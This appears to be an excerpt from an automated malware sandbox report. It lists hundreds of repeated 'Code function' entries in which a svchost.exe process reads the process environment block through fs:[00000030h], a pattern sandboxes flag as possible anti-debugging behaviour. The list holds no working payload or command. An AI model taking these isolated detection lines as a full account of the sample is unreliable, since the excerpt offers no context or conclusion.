Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE609 mov eax, dword ptr fs:[00000030h]	2_2_034AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472619 mov eax, dword ptr fs:[00000030h]	2_2_03472619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E627 mov eax, dword ptr fs:[00000030h]	2_2_0344E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03466620 mov eax, dword ptr fs:[00000030h]	2_2_03466620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468620 mov eax, dword ptr fs:[00000030h]	2_2_03468620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343262C mov eax, dword ptr fs:[00000030h]	2_2_0343262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0346A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0346A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]	2_2_034B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]	2_2_034B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]	2_2_03434690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]	2_2_03434690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0346C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034666B0 mov eax, dword ptr fs:[00000030h]	2_2_034666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]	2_2_03438550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]	2_2_03438550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]	2_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]	2_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]	2_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6500 mov eax, dword ptr fs:[00000030h]	2_2_034C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]	2_2_0346E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]	2_2_0346E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034365D0 mov eax, dword ptr fs:[00000030h]	2_2_034365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0346A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0346A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034325E0 mov eax, dword ptr fs:[00000030h]	2_2_034325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]	2_2_0346C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]	2_2_0346C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432582 mov eax, dword ptr fs:[00000030h]	2_2_03432582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432582 mov ecx, dword ptr fs:[00000030h]	2_2_03432582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464588 mov eax, dword ptr fs:[00000030h]	2_2_03464588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E59C mov eax, dword ptr fs:[00000030h]	2_2_0346E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]	2_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]	2_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]	2_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]	2_2_034545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]	2_2_034545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342645D mov eax, dword ptr fs:[00000030h]	2_2_0342645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345245A mov eax, dword ptr fs:[00000030h]	2_2_0345245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC460 mov ecx, dword ptr fs:[00000030h]	2_2_034BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]	2_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]	2_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]	2_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]	2_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]	2_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]	2_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]	2_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]	2_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]	2_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C427 mov eax, dword ptr fs:[00000030h]	2_2_0342C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A430 mov eax, dword ptr fs:[00000030h]	2_2_0346A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034304E5 mov ecx, dword ptr fs:[00000030h]	2_2_034304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034364AB mov eax, dword ptr fs:[00000030h]	2_2_034364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034644B0 mov ecx, dword ptr fs:[00000030h]	2_2_034644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_034BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]	2_2_034E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]	2_2_034E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]	2_2_034C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]	2_2_034C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FAB40 mov eax, dword ptr fs:[00000030h]	2_2_034FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D8B42 mov eax, dword ptr fs:[00000030h]	2_2_034D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DEB50 mov eax, dword ptr fs:[00000030h]	2_2_034DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342CB7E mov eax, dword ptr fs:[00000030h]	2_2_0342CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]	2_2_0345EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]	2_2_0345EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]	2_2_034F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]	2_2_034F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]	2_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]	2_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]	2_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]	2_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]	2_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]	2_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_034DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]	2_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]	2_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]	2_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EBFC mov eax, dword ptr fs:[00000030h]	2_2_0345EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_034BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]	2_2_03440BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]	2_2_03440BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_034E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_034E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]	2_2_03440A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]	2_2_03440A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]	2_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]	2_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]	2_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DEA60 mov eax, dword ptr fs:[00000030h]	2_2_034DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]	2_2_034ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]	2_2_034ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BCA11 mov eax, dword ptr fs:[00000030h]	2_2_034BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA24 mov eax, dword ptr fs:[00000030h]	2_2_0346CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EA2E mov eax, dword ptr fs:[00000030h]	2_2_0345EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]	2_2_03454A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]	2_2_03454A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA38 mov eax, dword ptr fs:[00000030h]	2_2_0346CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]	2_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]	2_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]	2_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430AD0 mov eax, dword ptr fs:[00000030h]	2_2_03430AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]	2_2_03464AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]	2_2_03464AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]	2_2_0346AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]	2_2_0346AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504A80 mov eax, dword ptr fs:[00000030h]	2_2_03504A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h]	2_2_03468A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]	2_2_03438AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]	2_2_03438AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486AA4 mov eax, dword ptr fs:[00000030h]	2_2_03486AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0946 mov eax, dword ptr fs:[00000030h]	2_2_034B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]	2_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347096E mov edx, dword ptr fs:[00000030h]	2_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]	2_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]	2_2_034D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]	2_2_034D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC97C mov eax, dword ptr fs:[00000030h]	2_2_034BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]	2_2_034AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]	2_2_034AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC912 mov eax, dword ptr fs:[00000030h]	2_2_034BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]	2_2_03428918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]	2_2_03428918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B892A mov eax, dword ptr fs:[00000030h]	2_2_034B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C892B mov eax, dword ptr fs:[00000030h]	2_2_034C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C69C0 mov eax, dword ptr fs:[00000030h]	2_2_034C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034649D0 mov eax, dword ptr fs:[00000030h]	2_2_034649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_034FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_034BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]	2_2_034629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]	2_2_034629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
